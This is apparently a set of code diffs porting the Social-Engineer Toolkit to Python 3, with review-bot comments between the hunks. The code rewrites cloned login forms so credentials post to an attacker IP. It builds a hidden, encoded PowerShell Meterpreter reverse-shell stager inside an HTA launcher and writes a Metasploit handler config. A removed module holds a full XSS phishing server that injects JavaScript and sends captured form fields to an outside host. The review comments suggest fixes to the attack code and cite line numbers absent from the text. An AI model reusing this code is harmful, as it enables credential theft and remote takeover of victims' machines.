"If this is blank, SET did not get a successful attempt on the website, sorry hoss..", "Report findings on %s<br><br>" % (url))
counter = 1
filewrite.write(line2)
opentag = True
for line3 in site_template:
match3=re.search("PARAM:", line3)
match3 = re.search("PARAM:", line3)
if match3:
xml=line3.replace("PARAM: ", "")
xml=xml.rstrip()
filewrite.write(line3+"<br>")
xml = line3.replace("PARAM: ", "")
xml = xml.rstrip()
filewrite.write(line3 + "<br>")
if opentag:
filewrite2.write(r" <url>")
opentag = False
filewrite2.write(r" <param>%s</param>" % (xml) + "\n")
match4=re.search("BREAKHERE", line3)
filewrite2.write(
r" <param>%s</param>" % (xml) + "\n")
match4 = re.search("BREAKHERE", line3)
if match4:
filewrite2.write(" </url>" + "\n")
opentag = True
filewrite.write("<br>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br><br>")
filewrite.write(
"<br>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br><br>")
# look for how many people visited the website
match5=re.search("VISITORSHERE", line2)
match5 = re.search("VISITORSHERE", line2)
if match5:
if os.path.isfile(setdir + "/visits.file"):
fileopen3=file(setdir + "/visits.file", "r")
counter5=0
fileopen3 = open(setdir + "/visits.file", "r")
counter5 = 0
for line in fileopen3:
if line != "":
line=line.rstrip()
counter5 = counter5+1
if line == "": counter5 = 0
line = line.rstrip()
counter5 = counter5 + 1
if line == "":
counter5 = 0
if not os.path.isfile(setdir + "/visits.file"):
counter5 = 0
line2=line2.replace("VISITORSHERE", str(counter5), 2)
line2 = line2.replace("VISITORSHERE", str(counter5), 2)
counter = 1
#filewrite.write(line2)
# filewrite.write(line2)
match6=re.search("BITESHERE", line2)
match6 = re.search("BITESHERE", line2)
if match6:
if os.path.isfile(setdir + "/bites.file"):
fileopen4=file(setdir + "/bites.file", "r")
fileopen4 = open(setdir + "/bites.file", "r")
counter5 = 0
for line in fileopen4:
line=line.rstrip()
counter5 = counter5+1
line = line.rstrip()
counter5 = counter5 + 1
if not os.path.isfile(setdir + "/bites.file"):
counter5=0
counter5 = 0
line2=line2.replace("BITESHERE", str(counter5))
line2 = line2.replace("BITESHERE", str(counter5))
counter = 1
filewrite.write(line2)
@ -114,8 +121,10 @@ try:
filewrite.close()
filewrite2.write(r"</harvester>" + "\n")
filewrite2.close()
except: pass
except:
pass
subprocess.Popen("cp -rf %s/src/core/reports/files %s/reports/" % (definepath,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print bcolors.BLUE + "[*] File exported to %s/reports/%s.html for your reading pleasure..." % (setdir,now) + bcolors.ENDC
print bcolors.BLUE + "[*] File in XML format exported to %s/reports/%s.xml for your reading pleasure..." % (setdir,now) + bcolors.ENDC
subprocess.Popen("cp -rf %s/src/core/reports/files %s/reports/" % (definepath,
setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print(bcolors.BLUE + "[*] File exported to %s/reports/%s.html for your reading pleasure..." % (setdir, now) + bcolors.ENDC)
print(bcolors.BLUE + "[*] File in XML format exported to %s/reports/%s.xml for your reading pleasure..." % (setdir, now) + bcolors.ENDC)


@ -4,7 +4,7 @@ import os
import sys
import re
import subprocess
import urlparse
import urllib.parse
import shutil
from src.core.setcore import *
@ -17,31 +17,33 @@ from src.core.setcore import *
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input(setcore.setprompt("0", "IP address to connect back on: "))
ipaddr = input(setcore.setprompt(
"0", "IP address to connect back on: "))
update_options("IPADDR=" + ipaddr)
# set the multiattack tabnabbing/webjacking flag
multi_tabnabbing="off"
multi_webjacking="off"
multi_tabnabbing = "off"
multi_webjacking = "off"
if os.path.isfile(setdir + "/multi_tabnabbing"):
multi_tabnabbing="on"
multi_tabnabbing = "on"
if os.path.isfile(setdir + "/multi_webjacking"):
multi_webjacking="on"
multi_webjacking = "on"
# see if we're tabnabbing
fileopen=file(setdir + "/attack_vector", "r")
fileopen = open(setdir + "/attack_vector", "r")
for line in fileopen:
line=line.rstrip()
line = line.rstrip()
if line == 'tabnabbing' or multi_tabnabbing == "on" or line == 'webjacking' or multi_webjacking == "on":
site='index2.html'
site = 'index2.html'
else:
site='index.html'
site = 'index.html'
# set ssl flag to false by default
ssl_flag="false"
ssl_flag = "false"
# SEE IF WE WANT TO USE SSL
ssl_check = check_config("WEBATTACK_SSL=").lower()
if ssl_check == "on": ssl_flag = "true"
if ssl_check == "on":
ssl_flag = "true"
# check apache mode
apache_mode = check_config("APACHE_SERVER=").lower()
@ -53,39 +55,46 @@ if track_user == "on":
apache_rewrite = ""
# if we are turned on, change this
if apache_mode == "on": apache_rewrite = "post.php"
if apache_mode == "on":
apache_rewrite = "post.php"
# start the scraping process
fileopen=file(setdir + "/web_clone/%s" % (site),"r").readlines()
filewrite=file(setdir + "/web_clone/index.html.new","w")
fileopen = open(setdir + "/web_clone/%s" % (site), "r").readlines()
filewrite = open(setdir + "/web_clone/index.html.new", "w")
for line in fileopen:
# specify if it found post params
counter=0
counter = 0
# if we hit on a post method
match=re.search('post',line, flags=re.IGNORECASE)
method_post=re.search("method=post", line, flags=re.IGNORECASE)
match = re.search('post', line, flags=re.IGNORECASE)
method_post = re.search("method=post", line, flags=re.IGNORECASE)
if match or method_post:
# regex for now, can probably use htmlparser later, but right not what its doing is
# replacing any url on the "action" field with your victim IP which will have a custom
# web server running to post the data to your site
# regex for now, can probably use htmlparser later, but right not what its doing is
# replacing any url on the "action" field with your victim IP which will have a custom
# web server running to post the data to your site
if ssl_flag == 'false':
line=re.sub('action="http?\w://[\w.\?=/&]*/', 'action="http://%s/' % (ipaddr), line)
line = re.sub(
'action="http?\w://[\w.\?=/&]*/', 'action="http://%s/' % (ipaddr), line)
if apache_mode == "on":
line = re.sub('action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
line = re.sub(
'action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
if ssl_flag == 'true':
line=re.sub('action="http?\w://[\w.\?=/&]*/', 'action="https://%s/' % (ipaddr), line)
line = re.sub(
'action="http?\w://[\w.\?=/&]*/', 'action="https://%s/' % (ipaddr), line)
if apache_mode == "on":
line = re.sub('action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
line = re.sub(
'action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
# this is if twitter is in use, we rename a function name to something garbage to remove password phishing restrictions
match2 = re.search("swiftActionQueue={buckets:j", line, flags=re.IGNORECASE)
# this is if twitter is in use, we rename a function name to something
# garbage to remove password phishing restrictions
match2 = re.search(
"swiftActionQueue={buckets:j", line, flags=re.IGNORECASE)
if match2:
# garble the buckets name, causes password to not be jacked
line = line.replace("swiftActionQueue={buckets:j", "swiftActionQueue={3buckets:j")
line = line.replace(
"swiftActionQueue={buckets:j", "swiftActionQueue={3buckets:j")
filewrite.write(line)
@ -97,5 +106,5 @@ if os.path.isfile(setdir + "/web_clone/index.html.new"):
shutil.copyfile(setdir + "/web_clone/index.html.new", setdir + "/" + site)
if os.path.isfile(setdir + "/web_clone/" + site):
os.remove(setdir + "/web_clone/" + site)
shutil.move(setdir + "/web_clone/index.html.new", setdir + "/web_clone/%s" % (site))
shutil.move(setdir + "/web_clone/index.html.new",
setdir + "/web_clone/%s" % (site))
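Review bot: The regex literals at L4876 and L4884 are plain (non-raw) strings containing `\w` and `\?`; under Python 3, the target of this port, those are invalid escape sequences that emit DeprecationWarning and are slated to become errors, so they should be raw strings, e.g. `line = re.sub(r'action="http?\w://[\w.\?=/&]*/', 'action="http://%s/' % (ipaddr), line)`. The pattern `'action="*"'` at L4880 and L4888 also matches `action=` followed by any number of quotes rather than the empty `action=""` it presumably targets; `r'action=""'` is likely what was meant, though that is inferred from the surrounding intent. `open(...).readlines()` at L4855 never closes the handle; `with open(...) as f: fileopen = f.readlines()` keeps the rest of the loop unchanged. Separately, `setcore.setprompt` at L4810 relies on a `setcore` name that the visible `from src.core.setcore import *` does not bind, so unless it is imported elsewhere in the file that prompt raises NameError.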


@ -6,41 +6,51 @@
######################################################
from src.core.setcore import *
def gen_hta_cool_stuff():
print_status("HTA Attack Vector selected. Enter your IP, Port, and Payload...")
ipaddr = raw_input("Enter the IP address for the reverse payload (LHOST): ")
update_options("IPADDR=%s" % (ipaddr))
port = raw_input("Enter the port for the reverse payload [443]: ")
if port == "": port = "443"
print """Select the payload you want to deliver:\n\n 1. Meterpreter Reverse TCP\n 2. Meterpreter Reverse HTTP\n 3. Meterpreter Reverse HTTPS\n"""
selection = raw_input("Enter the payload number [1-3]: ")
print_status(
"HTA Attack Vector selected. Enter your IP, Port, and Payload...")
ipaddr = input(
"Enter the IP address for the reverse payload (LHOST): ")
update_options("IPADDR=%s" % (ipaddr))
port = input("Enter the port for the reverse payload [443]: ")
if port == "":
port = "443"
print("""Select the payload you want to deliver:\n\n 1. Meterpreter Reverse TCP\n 2. Meterpreter Reverse HTTP\n 3. Meterpreter Reverse HTTPS\n""")
selection = input("Enter the payload number [1-3]: ")
# define the payloads
if selection == "": selection = "3"
if selection == "1": selection = "windows/meterpreter/reverse_tcp"
if selection == "2": selection = "windows/meterpreter/reverse_http"
if selection == "3": selection = "windows/meterpreter/reverse_https"
# define the payloads
if selection == "":
selection = "3"
if selection == "1":
selection = "windows/meterpreter/reverse_tcp"
if selection == "2":
selection = "windows/meterpreter/reverse_http"
if selection == "3":
selection = "windows/meterpreter/reverse_https"
# generate powershell code
print_status("Generating powershell injection code and x86 downgrade attack...")
ps = generate_powershell_alphanumeric_payload(selection, ipaddr, port, "x86")
command = "powershell -window hidden -enc " + ps
# hta code here
print_status("Embedding HTA attack vector and PowerShell injection...")
main1 = """<script>\na=new ActiveXObject("WScript.Shell");\na.run('%%windir%%\\\\System32\\\\cmd.exe /c %s', 0);window.close();\n</script>""" % (command)
main2 = """<iframe id="frame" src="Launcher.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>"""
# generate powershell code
print_status(
"Generating powershell injection code and x86 downgrade attack...")
ps = generate_powershell_alphanumeric_payload(
selection, ipaddr, port, "x86")
command = "powershell -window hidden -enc " + ps
# hta code here
print_status("Embedding HTA attack vector and PowerShell injection...")
main1 = """<script>\na=new ActiveXObject("WScript.Shell");\na.run('%%windir%%\\\\System32\\\\cmd.exe /c %s', 0);window.close();\n</script>""" % (command)
main2 = """<iframe id="frame" src="Launcher.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>"""
# metasploit answer file here
filewrite = file(setdir + "/meta_config", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (selection, ipaddr, port))
filewrite.close()
# metasploit answer file here
filewrite = open(setdir + "/meta_config", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (selection, ipaddr, port))
filewrite.close()
# write out main1 and main2
filewrite = file(setdir + "/hta_index", "w")
filewrite.write(main2)
filewrite.close()
# write out main1 and main2
filewrite = open(setdir + "/hta_index", "w")
filewrite.write(main2)
filewrite.close()
# write out launcher.hta
filewrite = file(setdir + "/Launcher.hta", "w")
filewrite.write(main1)
filewrite.close()
# write out launcher.hta
filewrite = open(setdir + "/Launcher.hta", "w")
filewrite.write(main1)
filewrite.close()
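Review bot: The menu selection read at L4931 is only mapped for "", "1", "2" and "3" (L4938–L4945); any other input is passed through unchanged as the payload name to `generate_powershell_alphanumeric_payload` at L4957 and written verbatim as `set payload` in meta_config at L4970. A guard before the mapping, `if selection not in ("", "1", "2", "3"): selection = "3"`, keeps the existing empty-input default and stops a typo from producing an unusable handler file. The `port` value at L4927 is likewise never checked to be numeric before it lands in `set LPORT` and in the generated PowerShell stager; `if not port.isdigit(): port = "443"` would mirror the empty-input default. gen_hta_cool_stuff may continue past the end of this hunk.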


@ -5,7 +5,7 @@
import subprocess
import os
try:
print """
print("""
Simply enter in the required fields, easy example below:
Name: FakeCompany
@ -16,16 +16,20 @@ State: Ohio
Country: US
Is this correct: yes
"""
print """*** WARNING ***\nIN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk\n*** WARNING ***"""
""")
print("""*** WARNING ***\nIN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk\n*** WARNING ***""")
# grab keystore to use later
subprocess.Popen("keytool -genkey -alias signapplet2 -keystore mykeystore -keypass mykeypass -storepass mystorepass", shell=True).wait()
subprocess.Popen(
"keytool -genkey -alias signapplet2 -keystore mykeystore -keypass mykeypass -storepass mystorepass", shell=True).wait()
# self-sign the applet
subprocess.Popen("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar Java_Obf.jar signapplet2", shell=True).wait()
subprocess.Popen(
"jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar Java_Obf.jar signapplet2", shell=True).wait()
# move it into our html directory
subprocess.Popen("rm ../../html/Signed_Update.jar.orig", shell=True).wait()
subprocess.Popen("cp Signed_Update.jar ../../html/Signed_Update.jar.orig", shell=True).wait()
subprocess.Popen("cp Java_Obf.jar ../../html/unsigned/unsigned.jar", shell=True).wait()
print "[*] New java applet has been successfully imported into The Social-Engineer Toolkit (SET)"
subprocess.Popen(
"cp Signed_Update.jar ../../html/Signed_Update.jar.orig", shell=True).wait()
subprocess.Popen(
"cp Java_Obf.jar ../../html/unsigned/unsigned.jar", shell=True).wait()
print("[*] New java applet has been successfully imported into The Social-Engineer Toolkit (SET)")
except:
pass
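Review bot: The bare `except: pass` at L5024–L5025 wraps the whole build and swallows every exception, including KeyboardInterrupt, while the `Popen(...).wait()` return codes at L5008–L5022 are discarded, so the exact failure L5005 warns about (no keytool/jarsigner on the system) ends with no message and no signed jar. At minimum narrow the handler to `except Exception as e:` and report it, and check the result of the signing steps, e.g. `if subprocess.Popen("jarsigner ...", shell=True).wait() != 0: print("[!] jarsigner failed")`, so the copy into ../../html is skipped when there is nothing to copy. The success line printed at L5023 is currently reached even when an earlier step failed.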


@ -4,10 +4,13 @@
#
import subprocess
import os
subprocess.Popen("rm Java_Update.jar", stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
subprocess.Popen("rm Java.class", stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
subprocess.Popen("rm Java_Update.jar", stderr=subprocess.PIPE,
stdout=subprocess.PIPE, shell=True)
subprocess.Popen("rm Java.class", stderr=subprocess.PIPE,
stdout=subprocess.PIPE, shell=True)
subprocess.Popen("javac Java.java", shell=True).wait()
subprocess.Popen("jar cvf Java_Update.jar Java.class", shell=True).wait()
subprocess.Popen("jar ufm Java_Update.jar manifest.mf", shell=True).wait()
subprocess.Popen("cp Java_Update.jar ../../html/unsigned/unsigned.jar", shell=True)
print "[*] Jar file exported as Java_Update.jar"
subprocess.Popen(
"cp Java_Update.jar ../../html/unsigned/unsigned.jar", shell=True)
print("[*] Jar file exported as Java_Update.jar")
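Review bot: The `rm` calls at L5035–L5038 and the final `cp` at L5044–L5045 are started with Popen but never waited on, so the removal of Java_Update.jar can race with the `jar cvf` at L5040 that recreates it, and the "[*] Jar file exported" message at L5046 can print before the copy into ../../html/unsigned has finished. Appending `.wait()` to each of those calls, as the javac/jar steps already do, serialises the sequence: `subprocess.Popen("cp Java_Update.jar ../../html/unsigned/unsigned.jar", shell=True).wait()`. The return codes of the waited steps are still ignored, so a javac failure leaves the old unsigned.jar in place with no indication.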


@ -1,222 +0,0 @@
#!/usr/bin/evn python
# XSS Phishing attack
# Written by Kyle Osborn
# kyle@kyleosborn.com
# GPLv2 License
# Logs data to an XML file. An XML parser will be created soon, or you can do it yourself.
# This is not an exploit tool, it's a payload tool.
# Once you've found the exloit, and you're able to inject javascript,
# just stick this in there as a script.
# <script src="http://YOURIP/">
# Proper HTTP Referers must be sent by the victim. If this is spoofed, or disabled, there will be odd results.
# Requirements - Everything below this line
import urllib2
import BeautifulSoup
import urlparse
import datetime
import re
import sys
from xml.dom import minidom
from xml.etree import ElementTree
from xml.etree.ElementTree import Element, SubElement
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from src.core import setcore
# GRAB DEFAULT PORT FOR WEB SERVER
fileopen=file("/etc/setoolkit/set.config" , "r").readlines()
counter=0
for line in fileopen:
line=line.rstrip()
match=re.search("MLITM_PORT=", line)
if match:
port=line.replace("MLITM_PORT=", "")
counter=1
# if nada default port 80
if counter == 0: web_port=8000
# Interface you want to bind to
bind = "0.0.0.0"
# Location of reports
reports = "./reports"
class RequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
try:
if re.search("^https?:\/\/(:?localhost|127)", self.headers["Referer"]) is None:
if self.path == '/':
print '[-] Incoming connection from %s' % self.client_address[0]
self.send_response(200)
self.send_header('Content-Type', 'text/javascript')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.end_headers()
print '[-] Grabbing payload from %s' % self.headers["Referer"]
self.prep_payload()
self.wfile.write(self.send_payload())
print '[-] Exploit sent to %s' % self.client_address[0]
elif self.path[0:11] == '/spacer.gif':
print '[*] Receiving data from %s' % self.client_address[0]
self.referer_host = self.headers["Referer"].replace("https://","").replace("http://","")
self.referer_host = self.referer_host.split("/")[0].split(".")
self.referer_host = self.referer_host[-2]+"."+self.referer_host[-1]
print self.referer_host
self.send_response(200)
self.send_header('Content-Type', 'image/gif')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.end_headers()
self.capture()
else:
#self.headers["Referer"] = "http://google.com/"
print '[-] Incoming connection from %s' % self.client_address[0]
print '[!] No referer'
except KeyError:
#self.headers["Referer"] = "http://google.com/"
print '[-] Incoming connection from %s' % self.client_address[0]
print '[!] No referer'
def send_payload(self):
return self.payload
def prep_payload(self):
js_payload = {}
js_payload[0] = """
function func() {
document.getElementsByTagName('body')[0].innerHTML = \""""
js_payload[2] = """\";
var formslength =document.getElementsByTagName('form').length;
for(var i=0; i<formslength; i++){
document.forms[i].setAttribute('onsubmit', 'myOnSubmit('+i+')');
}
}
function myOnSubmit(form) {
data = \"\";
for (i=0; i < document.forms[form].getElementsByTagName(\"input\").length; i++){
data = data+document.forms[form].getElementsByTagName(\"input\")[i].name+\"=\"+document.forms[form].getElementsByTagName(\"input\")[i].value+\"&\";
}
var img = document.createElement('img');
img.src = \""""
js_payload[4] = """?\"+data+\"\";
img.setAttribute('width', '100%');
img.setAttribute('height', '100%');
document.getElementsByTagName('body')[0].appendChild(img);
pause(500);
return true;
}
function pause(milsec){
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < milsec);
}
func();
document.execCommand('Stop');
"""
js_payload[1] = str(self.served())
js_payload[1] = js_payload[1].replace("\"","\\\"")
js_payload[3] = "http://"+self.headers["host"]+"/spacer.gif"
full_payload = ""
js_payload[1] = js_payload[1].replace("\t","").replace("\n","").replace("\r","")
for i in js_payload:
full_payload += str(js_payload[i])
self.payload = full_payload
def served(self):
t = urllib2.urlopen(self.headers["Referer"])
html = t.read()
soup = BeautifulSoup.BeautifulSoup(html)
body = soup.find(["body"])
return body
def capture(self):
self.generated_on = str(datetime.datetime.now())
self.path = self.path.split("?")[1].split(" ")[0]
dict = urlparse.parse_qs(self.path)
meta = {}
meta['ip'] = self.client_address
meta['browser'] = [self.headers["User-Agent"]]
meta['referer'] = [self.headers["Referer"]]
print "[+] Generating XML.."
root = Element('XSS')
root.set('version', '1.0')
request = SubElement(root, 'request')
site = SubElement(request, 'site')
site.text = self.address_string()
date = SubElement(request, 'date')
date.text = self.generated_on
requestLine = SubElement(request, 'requestLine')
requestLine.text = self.requestline
metaData = SubElement(request, 'meta')
for key, value in meta.iteritems():
ele = SubElement(metaData, key)
ele.text = value[0]
formData = SubElement(request, 'formData')
print '[*] Data received:'
for key, value in dict.iteritems():
if key == "":
key = "UNDEFINED"
print '[-] \t '+ str(key)+' => '+str(value)
ele = SubElement(formData, key)
ele.text = value[0]
self.log_data(self.prettify(root))
def prettify(self,elem):
"""Return a pretty-printed XML string for the Element.
"""
rough_string = ElementTree.tostring(elem, 'utf-8')
reparsed = minidom.parseString(rough_string)
return reparsed.toprettyxml(indent=" ")
def log_data(self,data):
report = open(reports+"/"+self.referer_host+"_"+self.generated_on.replace(" ","_").replace(":",".")+".xml","w+")
report.write(data)
report.close
print setcore.bcolors.BLUE + "\n***************************************************"
print setcore.bcolors.YELLOW + " Web Server Launched. Welcome to the SET MLTM."
print setcore.bcolors.BLUE + "***************************************************"
print setcore.bcolors.BLUE + "Man Left in the Middle Attack brought to you by:\nKyle Osborn - kyle@kyleosborn.com" + setcore.bcolors.ENDC
print "\nStarting server on %s:%s..." % (bind,port)
try:
serv = HTTPServer((bind, int(port)), RequestHandler)
print setcore.bcolors.GREEN + "[*] Server has started" + setcore.bcolors.ENDC
serv.serve_forever()
except Exception, e:
print e
print "Failed to start webserver.\n\nMake sure you have the permissions to bind on %s:%s" % (bind,port)


@ -19,68 +19,78 @@ me = mod_name()
# vector.
#######################################################
def return_menu():
print_status("Option added. You may select additional vectors")
time.sleep(2)
print("""\nSelect which additional attacks you want to use:\n""")
# option designators needed to ensure its defined ahead of time
java_applet="off"
meta_attack="off"
harvester="off"
tabnabbing="off"
mlitm="off"
webjacking="off"
java_applet = "off"
meta_attack = "off"
harvester = "off"
tabnabbing = "off"
mlitm = "off"
webjacking = "off"
# turning flag on
def flag_on(vector):
print_info("Turning the %s Attack Vector to " % (vector) + bcolors.GREEN + "ON" + bcolors.ENDC)
print_info("Turning the %s Attack Vector to " %
(vector) + bcolors.GREEN + "ON" + bcolors.ENDC)
# turning flag off
def flag_off(vector):
print_info("Turning the %s Attack Vector to " % (vector) + bcolors.RED + "OFF" + bcolors.ENDC)
print_info("Turning the %s Attack Vector to " %
(vector) + bcolors.RED + "OFF" + bcolors.ENDC)
# filewriting
def write_file(filename,results):
filewrite=file(setdir + "/%s" % (filename), "w")
def write_file(filename, results):
filewrite = open(setdir + "/%s" % (filename), "w")
filewrite.write(results)
filewrite.close()
# specify attackvector
filewrite=file(setdir + "/attack_vector","w")
filewrite = open(setdir + "/attack_vector", "w")
filewrite.write("multiattack")
filewrite.close()
# on and off switch detection variable
trigger=""
trigger = ""
# set toggle flags here
toggleflag_java=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_meta=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_harv=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_tabnab=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_mlitm=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_webjacking=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_java = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_meta = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_harv = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_tabnab = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_mlitm = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_webjacking = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# grab current path
definepath=os.getcwd()
definepath = os.getcwd()
# default flag for webdav to be off
webdav_enable="OFF"
webdav_enable = "OFF"
# see if we are running a custom cloned website
clonedurl = 0
fileopen = file(setdir + "/site.template", "r")
fileopen = open(setdir + "/site.template", "r")
data = fileopen.read()
if "TEMPLATE=SELF" in data:
clonedurl = 1
# clean up cloner directory
if clonedurl == 0:
subprocess.Popen("rm -rf %s/web_clone;mkdir %s/web_clone/" % (setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("rm -rf %s/web_clone;mkdir %s/web_clone/" % (setdir, setdir),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# set a quick loop to see what the user wants
a=1
a = 1
print ("""
[*************************************************************]
@ -97,29 +107,32 @@ print ("""
print("""\nSelect which attacks you want to use:
""")
while a==1:
trigger=""
print " 1. Java Applet Attack Method" + toggleflag_java
print " 2. Metasploit Browser Exploit Method" + toggleflag_meta
print " 3. Credential Harvester Attack Method" + toggleflag_harv
print " 4. Tabnabbing Attack Method" + toggleflag_tabnab
print " 5. Web Jacking Attack Method" + toggleflag_webjacking
print " 6. Use them all - A.K.A. 'Tactical Nuke'"
print " 7. I'm finished and want to proceed with the attack"
print "\n 99. Return to Main Menu\n"
while a == 1:
trigger = ""
print(" 1. Java Applet Attack Method" + toggleflag_java)
print(" 2. Metasploit Browser Exploit Method" + toggleflag_meta)
print(" 3. Credential Harvester Attack Method" + toggleflag_harv)
print(" 4. Tabnabbing Attack Method" + toggleflag_tabnab)
print(" 5. Web Jacking Attack Method" + toggleflag_webjacking)
print(" 6. Use them all - A.K.A. 'Tactical Nuke'")
print(" 7. I'm finished and want to proceed with the attack")
print("\n 99. Return to Main Menu\n")
profile = input(
setprompt(["2", "16"], "Enter selections one at a time (7 to finish)"))
profile=raw_input(setprompt(["2","16"], "Enter selections one at a time (7 to finish)"))
if profile == "": profile = "7"
if profile == "":
profile = "7"
# if the option is something other than 1-7 flag invalid option
# this will make sure its an integer, if not assign an 9 which will trigger invalid option
# this will make sure its an integer, if not assign an 9 which will
# trigger invalid option
try: # this will trigger an error if it isnt an integer
profile=int(profile)
profile = int(profile)
# convert it back
profile=str(profile)
profile = str(profile)
# if it triggers an exception reassign profile to option 8
except: profile = "10"
except:
profile = "10"
# if you want to return to main menu
if profile == "99":
@ -127,7 +140,7 @@ while a==1:
# trigger invalid option
if int(profile) >= 10:
raw_input("\nInvalid option..")
input("\nInvalid option..")
return_continue()
if profile == "6":
@ -135,7 +148,7 @@ while a==1:
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
print bcolors.RED + (r"""
print(bcolors.RED + (r"""
..-^~~~^-..
.~ ~.
(;: :;)
@ -146,13 +159,13 @@ while a==1:
| |
| |
| |
((/ \))""") + bcolors.ENDC
((/ \))""") + bcolors.ENDC)
print "\nSelecting everything SET has in its aresenal, you like sending a nuke don't you?"
print "\n[*] Note that tabnabbing is not enabled in the tactical nuke, select manually if you want.\n"
java_applet="on"
meta_attack="on"
harvester="on"
print("\nSelecting everything SET has in its aresenal, you like sending a nuke don't you?")
print("\n[*] Note that tabnabbing is not enabled in the tactical nuke, select manually if you want.\n")
java_applet = "on"
meta_attack = "on"
harvester = "on"
break
if profile == "7":
@ -163,18 +176,18 @@ while a==1:
if java_applet == "off":
flag_on("Java Applet")
return_menu()
java_applet="on"
trigger=1
#toggle_flags here
toggleflag_java=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
java_applet = "on"
trigger = 1
# toggle_flags here
toggleflag_java = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if java_applet == "on":
if trigger != 1:
flag_off("Java Applet")
return_menu()
java_applet="off"
java_applet = "off"
# toggle flags here
toggleflag_java=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_java = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# metasploit client_side on/off
if profile == "2":
@ -182,145 +195,151 @@ while a==1:
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
if meta_attack=="off":
if meta_attack == "off":
flag_on("Metasploit Client Side")
return_menu()
meta_attack="on"
trigger=1
meta_attack = "on"
trigger = 1
# toggle flags here
toggleflag_meta=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_meta = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if meta_attack=="on":
if meta_attack == "on":
if trigger != 1:
flag_off("Metasploit Client Side")
return_menu()
meta_attack="off"
meta_attack = "off"
# toggle flags here
toggleflag_meta=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_meta = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# harvester on/off
if profile == "3":
if harvester == "off":
flag_on("Harvester")
return_menu()
harvester="on"
trigger=1
harvester = "on"
trigger = 1
# toggle flags here
toggleflag_harv=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_harv = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm="off"
toggleflag_mlitm=(bcolors.RED+" (OFF)" + bcolors.ENDC)
mlitm = "off"
toggleflag_mlitm = (bcolors.RED + " (OFF)" + bcolors.ENDC)
if harvester == "on":
if trigger != 1:
flag_off("Harvester")
return_menu()
harvester="off"
harvester = "off"
# toggle flags here
toggleflag_harv=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_harv = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# if tabnabbing is enabled, no need for harvester to be enabled as well
if profile == "4":
if tabnabbing == "off":
flag_on("Tabnabbing")
return_menu()
tabnabbing="on"
trigger=1
harvester="on"
tabnabbing = "on"
trigger = 1
harvester = "on"
# toggle flags here
toggleflag_tabnab=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_tabnab = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm="off"
toggleflag_mlitm=(bcolors.RED+" (OFF)" + bcolors.ENDC)
print webjacking
mlitm = "off"
toggleflag_mlitm = (bcolors.RED + " (OFF)" + bcolors.ENDC)
print(webjacking)
if webjacking == "on":
webjacking = "off"
toggleflag_webjacking=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_webjacking = (bcolors.RED + " (OFF)" + bcolors.ENDC)
if tabnabbing == "on":
if trigger != 1:
